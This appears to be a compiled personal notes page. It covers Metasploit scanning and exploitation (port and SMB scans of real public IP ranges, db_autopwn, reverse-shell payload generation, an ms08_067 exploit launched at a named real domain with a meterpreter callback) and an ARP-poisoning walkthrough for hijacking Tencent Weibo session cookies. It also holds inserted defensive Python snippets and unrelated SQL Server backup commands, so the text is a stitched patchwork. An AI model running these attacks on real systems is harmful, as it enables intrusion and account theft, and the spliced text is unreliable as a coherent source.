Collected by Hlly_M风迷
qing.weibo.com/hllym

A primer on using scanners in Metasploit | using portscan && scanner/smb/smb_version

Port scanning tools:

[bash]

msf > search portscan

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
msf >

[/bash]

The port scanners listed above are all used in much the same way; only the type and purpose of the scan differ, so use whichever fits the situation.

Taking one of them as an example:

[bash]

msf > use auxiliary/scanner/portscan/ftpbounce
msf auxiliary(ftpbounce) > show options

Module options (auxiliary/scanner/portscan/ftpbounce):

Name Current Setting Required Description
---- --------------- -------- -----------
BOUNCEHOST yes FTP relay host
BOUNCEPORT 21 yes FTP relay port
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

msf auxiliary(ftpbounce) > set RHOSTS 108.171.217.91/24
RHOSTS => 108.171.217.91/24
msf auxiliary(ftpbounce) > set THREADS 600
THREADS => 600
msf auxiliary(ftpbounce) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: BOUNCEHOST.
msf auxiliary(ftpbounce) > set BOUNCEHOST 110.120.119.54
BOUNCEHOST => 110.120.119.54
msf auxiliary(ftpbounce) > run

[*] Scanned 107 of 256 hosts (041% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftpbounce) >

[/bash]

The other portscan tools are used in a similar way.

Scanning for the target host's operating system type:

SMB: Server Message Block

[bash]

msf auxiliary(ftpbounce) > back
msf > search scanner/smb

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/pipe_auditor normal SMB Session Pipe Auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor normal SMB Session Pipe DCERPC Auditor
auxiliary/scanner/smb/smb2 normal SMB 2.0 Protocol Detection
auxiliary/scanner/smb/smb_enumshares normal SMB Share Enumeration
auxiliary/scanner/smb/smb_enumusers normal SMB User Enumeration (SAM EnumUsers)
auxiliary/scanner/smb/smb_enumusers_domain normal SMB Domain User Enumeration
auxiliary/scanner/smb/smb_login normal SMB Login Check Scanner
auxiliary/scanner/smb/smb_lookupsid normal SMB Local User Enumeration (LookupSid)
auxiliary/scanner/smb/smb_version normal SMB Version Detection
msf >

[/bash]

Using smb/smb_version is shown below; it can be used to enumerate the server's operating system. Generally it will not find anything: this vulnerability is ancient, and even the shabbiest servers have patched it.

When testing personal computers, though, this command is very useful, and it can usually identify the operating system type.

[bash]

msf auxiliary(smb_version) > back
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 108.171.217.0/24 yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1024 yes The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 118.123.106.56/24
RHOSTS => 118.123.106.56/24
msf auxiliary(smb_version) > set THREADS 600
THREADS => 600
msf auxiliary(smb_version) > run

[*] Scanned 042 of 256 hosts (016% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 120 of 256 hosts (046% complete)
[*] Scanned 127 of 256 hosts (049% complete)
[*] Scanned 136 of 256 hosts (053% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 233 of 256 hosts (091% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 245 of 256 hosts (095% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

[/bash]

A worked example of nmap scanning in Metasploit

Check the Metasploit database connection status. Metasploit 4.0 and later connect to the bundled database automatically, so there is no longer any need to load db_mysql and then run db_connect as before.

[bash]

msf > db_status
[*] postgresql connected to msf3dev

[/bash]

To list the commands beginning with db_, type db_ and press the Tab key twice; the following appears.

[bash]

msf > db_
db_connect db_export db_nmap db_status
db_disconnect db_import db_rebuild_cache

[/bash]

Of course, using the help command works just as well.

[bash]

msf > help

Core Commands
=============

Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
popm Pops the latest module off of the module stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================

Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

msf >

[/bash]

db_nmap is used for host port scanning and service discovery. Commonly used parameters:

-A : aggressive (in-depth) scan

-sS : SYN scan; tries to keep the scan inconspicuous. This parameter cannot be used together with -sI <ip>.

-sI <ip> : use <ip> as the apparent source of the scan, so that whoever looks at it only sees <ip> scanning them.

-oX <filename> : write the scan results to the file <filename> as XML, so that they can be imported into Metasploit with db_import and then handed to db_autopwn for automatic exploitation, right?

-Pn : no ping; do not use ping to decide whether a host is alive before scanning. Long, long ago, ping was a workable and reliable liveness test, but ever since someone discovered that ping could be used to launch DDoS attacks, ICMP handling has been tightened and guarded against. So a host that does not answer ping is not necessarily down. You know what I mean.

Oh, and one more important parameter:

-v : show scan progress. Otherwise you will think nmap has hung and impatiently Ctrl-C it.

 

So, an example of a typical scan command:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:27 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 256 hosts. at 19:27
Completed Parallel DNS resolution of 256 hosts. at 19:27, 2.24s elapsed
Initiating SYN Stealth Scan at 19:27
Scanning 64 hosts [1000 ports/host]
Discovered open port 53/tcp on 108.171.217.50
SYN Stealth Scan Timing: About 1.06% done; ETC: 20:15 (0:48:02 remaining)
Discovered open port 53/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.50
Discovered open port 53/tcp on 108.171.217.53
Discovered open port 53/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.18
Discovered open port 443/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.35
Discovered open port 53/tcp on 108.171.217.52
Discovered open port 80/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.50
Discovered open port 80/tcp on 108.171.217.51

# (a large chunk of output omitted)

[/bash]

Then:

db_import ieroot

The ieroot file is the result of the nmap scan above.

And then:

load db_autopwn

db_autopwn then automatically scans for exploitable hosts.

A few commonly used db_autopwn parameters:

-e : launch exploits against every host in the scan results stored in the database

-t : show all matching modules

-r : use a reverse connection. Reverse connections have their advantages; this is the parameter to use for getting through firewalls

-x : select exploit modules based on vulnerability references

-p : select exploit modules based on open ports. Many hosts have their service ports changed beyond recognition, so be careful when using -p

So the process is as follows:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:35 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 19:35
Completed Parallel DNS resolution of 1 host. at 19:35, 0.00s elapsed
Initiating SYN Stealth Scan at 19:35
Scanning 108-171-217-51.static.webnx.com (108.171.217.51) [1000 ports]
Completed SYN Stealth Scan at 19:36, 17.18s elapsed (1000 total ports)
Initiating Service scan at 19:36
Initiating OS detection (try #1) against 108-171-217-51.static.webnx.com (108.171.217.51)
Initiating Traceroute at 19:36
Completed Traceroute at 19:36, 3.03s elapsed
Initiating Parallel DNS resolution of 19 hosts. at 19:36
Completed Parallel DNS resolution of 19 hosts. at 19:36, 13.00s elapsed
NSE: Script scanning 108.171.217.51.
Initiating NSE at 19:36
Completed NSE at 19:36, 10.00s elapsed
Nmap scan report for 108-171-217-51.static.webnx.com (108.171.217.51)
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp closed http
8888/tcp closed sun-answerbook
Too many fingerprints match this host to give specific OS details
Network Distance: 20 hops

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.76 ms 121.250.211.1
2 …
3 48.77 ms 202.194.0.125
4 0.62 ms 202.194.0.45
5 0.89 ms 58.194.164.174
6 1.70 ms 222.173.20.205
7 1.63 ms 60.235.2.77
8 11.68 ms 60.235.0.73
9 10.23 ms 202.97.42.174
10 23.02 ms 202.97.40.9
11 21.08 ms 202.97.33.30
12 21.44 ms 202.97.33.190
13 155.27 ms 202.97.50.122
14 324.65 ms 202.97.49.158
15 315.15 ms 10gigabitethernet6-1.core1.lax1.he.net (64.71.131.133)
16 320.71 ms 10gigabitethernet1-3.core1.lax2.he.net (72.52.92.122)
17 314.85 ms 216.218.213.250
18 320.26 ms 100-42-223-146.static.webnx.com (100.42.223.146)
19 299.95 ms 100-42-223-198.static.webnx.com (100.42.223.198)
20 309.17 ms 108-171-217-51.static.webnx.com (108.171.217.51)

Read data files from: /opt/metasploit/common/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.88 seconds
Raw packets sent: 2059 (92.876KB) | Rcvd: 33 (1.688KB)
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–

msf > db_import ieroot
[*] Importing ‘Nmap XML’ data
[*] Import: Parsing with ‘Rex::Parser::NmapXMLStreamParser’
[*] Importing host 108.171.217.51
[*] Successfully imported /root/ieroot
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

msf >

[/bash]
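The hosts table above is what db_import recovers from the -oX XML file. As an added example (not from the original post and not Metasploit's own code), here is a small Python parser over a constructed Nmap XML document, with constructed addresses, hostnames and services, that performs the same root-element file-type check and extracts the address, hostname, OS guess and open services that the hosts and services commands display.

```python
import xml.etree.ElementTree as ET

# Constructed sample Nmap XML (not the page's scan). The structure follows what
# `nmap -oX` writes: one <host> per target with <address>, <hostnames>,
# <ports> and an optional <os> block. All addresses and names are made up.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -A -Pn -v -oX sample 192.0.2.0/29" version="5.51SVN">
  <host>
    <status state="up" reason="user-set"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="ns1.example.test" type="PTR"/></hostnames>
    <ports>
      <extraports state="filtered" count="998"/>
      <port protocol="tcp" portid="53"><state state="open" reason="syn-ack"/><service name="domain" product="ISC BIND" version="9.8.1"/></port>
      <port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/><service name="https" product="nginx"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.32 - 3.2" accuracy="95"/></os>
  </host>
  <host>
    <status state="up" reason="user-set"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <hostnames/>
    <ports>
      <extraports state="filtered" count="997"/>
      <port protocol="tcp" portid="21"><state state="closed" reason="reset"/><service name="ftp"/></port>
      <port protocol="tcp" portid="80"><state state="closed" reason="reset"/><service name="http"/></port>
      <port protocol="tcp" portid="8888"><state state="closed" reason="reset"/><service name="sun-answerbook"/></port>
    </ports>
    <os><osmatch name="Sun Solaris 9" accuracy="85"/></os>
  </host>
  <runstats><finished elapsed="45.88"/><hosts up="2" down="0" total="2"/></runstats>
</nmaprun>
"""


def is_nmap_xml(text):
    """File-type detection the way an importer does it: well-formed XML whose root is <nmaprun>."""
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return False
    return root.tag == "nmaprun"


def parse_nmap_xml(text):
    """Return one record per host: address, reverse name, OS guess and every port seen."""
    root = ET.fromstring(text)
    if root.tag != "nmaprun":
        raise ValueError("not an Nmap XML document")
    hosts = []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue  # skip hosts that only carry a MAC or IPv6 address
        name_el = host.find("hostnames/hostname")
        os_el = host.find("os/osmatch")
        services = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            svc = port.find("service")
            services.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "name": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
            })
        hosts.append({
            "address": addr_el.get("addr"),
            "name": name_el.get("name") if name_el is not None else "",
            "os_name": os_el.get("name") if os_el is not None else "",
            "services": services,
        })
    return hosts


def open_services(hosts):
    """Only open ports belong in an asset inventory; closed and filtered ones are noise."""
    return [(h["address"], s["port"], s["name"])
            for h in hosts for s in h["services"] if s["state"] == "open"]


if __name__ == "__main__":
    records = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in records:
        print(h["address"], h["name"] or "-", h["os_name"] or "-")
    for addr, port, name in open_services(records):
        print(f"  {addr}:{port}/tcp {name}")
```

The second constructed host mirrors the shape of the page's own result (three closed ports, an OS match but no usable service): it still lands in the hosts table, but contributes nothing to the services list, which is why an import with no open ports gives db_autopwn nothing to match.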

[bash]

msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -e -p -t
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it’s current limitations/issues.
[-] Minimal support and development via neinwechter on GitHub metasploit fork.
[-]
[*] Analysis completed in 44 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] ================================================================================
[*]
[*]
[*] The autopwn command has completed with 0 sessions

msf > sessions -l

Active sessions
===============

No active sessions.

msf > hosts -d

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

[*] Deleted 1 hosts
msf >

[/bash]

Sessions are not easy to get. If you do get one, use sessions -i 1 to interact with the first session, and so on for the others. Once you have a shell there is nothing more to say.

 

msfpayload: the Metasploit command for generating shellcode

[bash]

root@ieroot:~# msfpayload -h

Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

-h Help banner
-l List available payloads

root@ieroot:~#

[/bash]

It can generate payloads in various formats, selected with the last argument shown in the usage above.

The usage of msfpayload is similar to that of msfcli.

[bash]

root@ieroot:~# msfpayload windows/x64/vncinject/reverse_tcp o

Name: Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
Module: payload/windows/x64/vncinject/reverse_tcp
Version: 14774, 15548, 14976
Platform: Windows
Arch: x86_64
Needs Admin: No
Total size: 422
Rank: Normal

Provided by:
sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy

Description:
Connect back to the attacker (Windows x64), Inject a VNC Dll via a
reflective loader (Windows x64) (staged)
root@ieroot:~#

[/bash]

The rest is straightforward. Options are set in the form LHOST=192.168.0.222. Use a lowercase o to view the options, and C, J, X and so on to choose the output format.

 

In addition, msfencode can be used to encode the generated payload (call it a payload or a backdoor, either way).

msfencode -l lists the available encoders

msfencode -h shows the help

Usage of the Metasploit msfcli command, with examples

The msfcli command is designed to make it convenient to drive the Metasploit framework from other shells and scripts.

[bash]

root@ieroot:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode]
=======================================================================

Mode Description
—- ———–
(A)dvanced Show available advanced options for this module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
(H)elp You’re looking at it baby!
(I)DS Evasion Show available ids evasion options for this module
(O)ptions Show available options for this module
(P)ayloads Show available payloads for this module
(S)ummary Show information about this module
(T)argets Show available targets for this exploit module

root@ieroot:~#

[/bash]

To view the options of a particular exploit:

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi o
[*] Please wait while we load the module tree…

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

root@ieroot:~#

[/bash]

 

The command to set options and list the compatible payloads at the same time:

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi RHOST=127.0.0.1 p
[*] Please wait while we load the module tree…

Compatible payloads
===================

Name Description
—- ———–
generic/custom Use custom string or file as payload. Set either PAYLOADFILE or
PAYLOADSTR.
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a DLL via a reflective loader
windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a DLL via a reflective loader
windows/dllinject/bind_tcp Listen for a connection, Inject a DLL via a reflective loader
windows/dllinject/reverse_http Tunnel communication over HTTP, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a DLL via a reflective loader
windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a DLL via a reflective loader
windows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload
windows/exec Execute an arbitrary command
windows/loadlibrary Load an arbitrary library path

# ... many more entries omitted here

[/bash]

With the options and payload set, the command to run the exploit is:

[bash]

root@ieroot:~# msfcli windows/smb/ms08_067_netapi RHOST=www.haotuan.us PAYLOAD=windows/meterpreter/reverse_tcp LHOST=www.ieroot.com E
[*] Please wait while we load the module tree…

______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
|______________________________________________________________________________|


=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — –=[ 961 exploits – 509 auxiliary – 153 post
+ — –=[ 257 payloads – 28 encoders – 8 nops
=[ svn r15907 updated today (2012.09.28)

RHOST => www.haotuan.us
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => www.ieroot.com
[-] Handler failed to bind to 173.193.106.10:4444
[*] Started reverse handler on 0.0.0.0:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (www.haotuan.us:445).

root@ieroot:~#

# When trying this yourself, replace www.haotuan.us and www.ieroot.com in this example with the target (victim) machine's IP and your own machine's IP respectively

# And don't forget to set the ports on each side too, dear

[/bash]

 

 

// The content above comes from the book Metasploit: The Penetration Tester's Guide; it is here purely for my own convenient reference

BackTrack: cookie hijacking

DiS9 TeAm

1. Introduction

Still browsing Weibo over unencrypted Wi-Fi? Beware: your cookies can be hijacked and your Weibo account used by someone else!

In this article we describe how arpspoof, Wireshark and the Cookie Injector script are used to hijack Tencent Weibo cookies.

 

2. ARP poisoning

Enable kernel IP forwarding: echo "1" > /proc/sys/net/ipv4/ip_forward

Using the traceroute command to find the gateway address, we see that the current gateway is 192.168.2.1

Use arpspoof to carry out the ARP poisoning

2.1 Check the current network interface name with the ifconfig command

2.2 Use arpspoof to poison ARP and capture the cookie

Arpspoof -i eth1 -t 192.168.2.111 192.168.2.1

The target machine's arp -a before poisoning

The target machine's arp -a after poisoning

From this we can see that the poisoning succeeded. (Tip: don't forget the kernel IP forwarding from the first step, otherwise the target loses its network connection.)

Use Wireshark to capture the traffic and enter the display filter http.cookie contains t.qq.com (tip: http.cookie matches the Cookie header of HTTP requests, and contains t.qq.com matches content that contains t.qq.com).

We find it:

Locate the Cookie field and copy it out.

Next we use the Cookie Injector script for Firefox Greasemonkey.

Download: https://userscripts.org/scripts/show/119798

Note: after installing it for the first time, restart the browser, otherwise it does not take effect!

 

Then we press Alt+C to bring up the Cookie Injector script.

Paste the cookie we just copied.

Click OK, then refresh the page.

Bingo, we are logged into Tencent Weibo.
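The before-and-after arp -a comparison in section 2 is also the simplest way for the target to notice that it is being poisoned. As an added example written from the defender's side (not part of the original post), the following Python parses arp -a output in both the Linux and the Windows format, using constructed sample tables with made-up MAC addresses, and flags two signs of ARP spoofing: the gateway's MAC changing between snapshots, and one MAC being claimed by more than one IP address.

```python
import re

# Matches both Linux "? (192.168.2.1) at 00:11:22:33:44:55 [ether] on eth1"
# and Windows "  192.168.2.1           00-11-22-33-44-55     dynamic" lines.
_ARP_LINE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\D+?([0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5})"
)

# Constructed snapshots of a client's ARP table; every MAC here is made up.
# Before: the gateway 192.168.2.1 has its own MAC, 192.168.2.107 another.
BEFORE_ARP = """? (192.168.2.1) at 00:11:22:33:44:55 [ether] on eth1
? (192.168.2.107) at aa:bb:cc:dd:ee:01 [ether] on eth1
? (192.168.2.120) at 08:00:27:12:34:56 [ether] on eth1
"""
# After: the gateway entry now carries the MAC of 192.168.2.107.
AFTER_ARP = """? (192.168.2.1) at aa:bb:cc:dd:ee:01 [ether] on eth1
? (192.168.2.107) at aa:bb:cc:dd:ee:01 [ether] on eth1
? (192.168.2.120) at 08:00:27:12:34:56 [ether] on eth1
"""
# The same poisoned state as Windows `arp -a` would print it (constructed).
WINDOWS_ARP = """Interface: 192.168.2.111 --- 0xb
  Internet Address      Physical Address      Type
  192.168.2.1           aa-bb-cc-dd-ee-01     dynamic
  192.168.2.107         aa-bb-cc-dd-ee-01     dynamic
"""


def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` output, MACs normalised to lowercase colon form."""
    table = {}
    for line in text.splitlines():
        m = _ARP_LINE.search(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table


def gateway_mac_changed(before, after, gateway_ip):
    """Return (old_mac, new_mac) if the gateway's MAC differs between snapshots, else None."""
    old, new = before.get(gateway_ip), after.get(gateway_ip)
    if old and new and old != new:
        return (old, new)
    return None


def shared_macs(table):
    """MACs claimed by more than one IP: the usual footprint of a host answering for the gateway."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def audit(before_text, after_text, gateway_ip):
    """Combine both checks into a list of human-readable findings."""
    before, after = parse_arp_table(before_text), parse_arp_table(after_text)
    findings = []
    change = gateway_mac_changed(before, after, gateway_ip)
    if change:
        findings.append(f"gateway {gateway_ip} MAC changed {change[0]} -> {change[1]}")
    for mac, ips in shared_macs(after).items():
        findings.append(f"MAC {mac} claimed by {', '.join(ips)}")
    return findings


if __name__ == "__main__":
    for finding in audit(BEFORE_ARP, AFTER_ARP, "192.168.2.1"):
        print(finding)
```

A static ARP entry for the gateway on the client, or dynamic ARP inspection on a managed switch, prevents the table from being rewritten in the first place; the check above only tells you that it has happened.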

 

If you have any questions, e-mail me: hkhdgj@Hotmail.com

 

Legal notice: this article is for technical research and discussion only; if it is used for malicious purposes, the author and this site bear no responsibility!

By:Joe Lynch

SQL Server 2008 database backup commands

Two ways to back up SQL Server:

1. Through a maintenance plan

2. Through a job that runs the commands

-- Differential backup
EXECUTE master.dbo.xp_create_subdir N'D:\pic\RE\TEST'
GO
BACKUP DATABASE [TEST] TO  DISK = N'D:\pic\RE\TEST\TEST_backup_201101051801.bak' 
WITH  DIFFERENTIAL , NOFORMAT, NOINIT,  
NAME = N'TEST_backup_20110105180152', SKIP, REWIND, NOUNLOAD,  STATS = 10
go

-- Full backup
BACKUP DATABASE [TEST] TO  DISK = N'D:\pic\RE\TEST_backup_201101051802.bak' 
WITH NOFORMAT, NOINIT,  
NAME = N'TEST_backup_20110105180256', SKIP, REWIND, NOUNLOAD,  STATS = 10
go

-- Forced restore
-- REPLACE overwrites an existing database of the same name
RESTORE DATABASE TEST 
   FROM DISK = 'C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Backup\TEST.BAK'
   WITH MOVE 'TEST' TO 'D:\pic\TEST.mdf', 
   MOVE 'TEST_log' TO 'D:\pic\TEST_log.ldf',
   STATS = 10, REPLACE
GO

-- List the database files contained in the backup
RESTORE FILELISTONLY 
   FROM DISK = 'C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Backup\TEST.BAK'
go

Generate a backup file named with the current date and time

declare @databasename nvarchar(50)
set @databasename = 'ExtDB'
DECLARE @strPath NVARCHAR(200)
-- Style 120 gives 'yyyy-mm-dd hh:mi:ss'
set @strPath = convert(NVARCHAR(19),getdate(),120)
-- Colons are not allowed in Windows file names, so replace them with dots
set @strPath = REPLACE(@strPath, ':' , '.')
set @strPath = 'E:\工作目录\bk\' + @databasename+@strPath + '.bak'
BACKUP DATABASE @databasename  TO DISK = @strPath WITH NOINIT , NOUNLOAD , NOSKIP , STATS = 10, NOFORMAT